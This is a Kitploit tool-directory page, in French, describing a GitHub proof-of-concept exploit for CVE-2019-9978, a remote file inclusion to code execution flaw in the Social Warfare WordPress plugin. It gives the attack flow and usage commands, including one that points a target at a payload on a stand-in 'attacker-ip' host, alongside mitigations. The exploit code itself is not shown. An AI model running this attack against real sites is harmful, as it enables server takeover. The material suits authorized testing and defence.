Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-9978-RCE-PoC — Une preuve de concept Python personnalisée présentant l'analyse des causes profondes et l'exploitation de CVE 2019-9978 (plugin Social Warfare),axée sur le flux d'attaque pratique de RFI à RCE. | Kitploit
Outils/GitHubGitHub/vaidehim55/cve-2019-9978-rce-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubvaidehim55/cve-2019-9978-rce-poc

CVE-2019-9978-RCE-PoC

Une preuve de concept Python personnalisée présentant l'analyse des causes profondes et l'exploitation de CVE 2019-9978 (plugin Social Warfare),axée sur le flux d'attaque pratique de RFI à RCE.

Voir le dépôt
11il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-9978 RCE PoC – Social Warfare WordPress Plugin Exploit

Inclusion de fichier distant non authentifiée (RFI) menant à une exécution de code à distance (RCE)


📌 Description

Ce dépôt contient une preuve de concept (PoC) basée sur Python démontrant l'exploitation de CVE-2019-9978, une vulnérabilité critique dans le plugin WordPress Social Warfare.

La vulnérabilité permet à un attaquant non authentifié d'effectuer une inclusion de fichier distant (RFI), qui peut être escaladée en exécution de code à distance (RCE)* en hébergeant une charge utile malveillante sur un serveur contrôlé par l'attaquant.

Cette PoC a été développée et testée dans un environnement de laboratoire WordPress contrôlé à des fins éducatives et de tests de sécurité autorisés uniquement.


🔍 Résumé de la vulnérabilité

  • CVE ID: CVE-2019-9978
  • Composant affecté : Social Warfare (Plugin WordPress)
  • Versions affectées : ≤ 3.5.2
  • Type de vulnérabilité : Inclusion de fichier distant (RFI)
  • Impact : Exécution de code à distance (RCE)
  • Authentification requise : Non
  • Vecteur d'attaque : Distant
  • Sévérité : Critique

  • 🧠 Analyse de la cause racine

    Le plugin Social Warfare ne parvient pas à valider et nettoyer correctement les entrées fournies par l'utilisateur utilisées pour l'inclusion de contenu distant.
    En conséquence, un attaquant peut fournir une URL externe malveillante, conduisant à une inclusion de fichier distant non authentifiée.

    Lorsque le fichier distant inclus contient du code PHP exécutable, celui-ci est exécuté dans le contexte du serveur WordPress, entraînant une exécution de code à distance.


    🔄 Flux d'attaque

    root@kitploit:~
    Unauthenticated HTTP Request
    ↓
    Remote File Inclusion (External URL)
    ↓
    Malicious Payload Execution
    ↓
    Remote Code Execution (RCE)
    
    

    🧪 Preuve de concept (PoC)

    1. L'attaquant héberge une charge utile malveillante sur un serveur HTTP externe
    2. Le point de terminaison vulnérable de Social Warfare inclut le fichier distant
    3. La charge utile s'exécute sur le serveur WordPress cible
    4. L'attaquant obtient une exécution de commande à distance
    5. Le script d'exploitation automatise ce processus à des fins de test et de recherche

    ▶️ Utilisation

    Étape 1 : Héberger la charge utile

    root@kitploit:~
    python3 -m http.server 8000
    

    Placez votre fichier de charge utile (par exemple, payload-main.txt) dans le répertoire du serveur.


    Étape 2 : Exécuter l'exploit

    root@kitploit:~
    python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt
    

    🛠 Prérequis

    • Python 3.x
    • Version vulnérable du plugin WordPress Social Warfare
    • Environnement de test WordPress
    • Serveur HTTP local ou distant pour héberger la charge utile

    🛡 Atténuation et défense

    • Mettre à jour le plugin Social Warfare vers une version corrigée

    • Désactiver l'inclusion de fichier distant :

      root@kitploit:~
      allow_url_include = Off
      
    • Restreindre la gestion des URL externes dans les plugins WordPress

    • Déployer un pare-feu d'application Web (WAF) avec des règles de détection RFI


    ⚠️ Avis de non-responsabilité légal

    Ce projet est destiné strictement à des fins éducatives et de tests de sécurité autorisés uniquement.

    N'utilisez PAS cette preuve de concept contre des systèmes sans autorisation explicite. L'auteur n'est pas responsable de toute mauvaise utilisation ou des dommages causés par cet outil.


    🔗 Références et crédits

    • Chercheur original : Luka Sikic
    • Référence originale de la PoC : https://github.com/hash3liZer/CVE-2019-9978
    • Auteur / Adaptation : Vaidehi Muluru
    Télécharger l’outil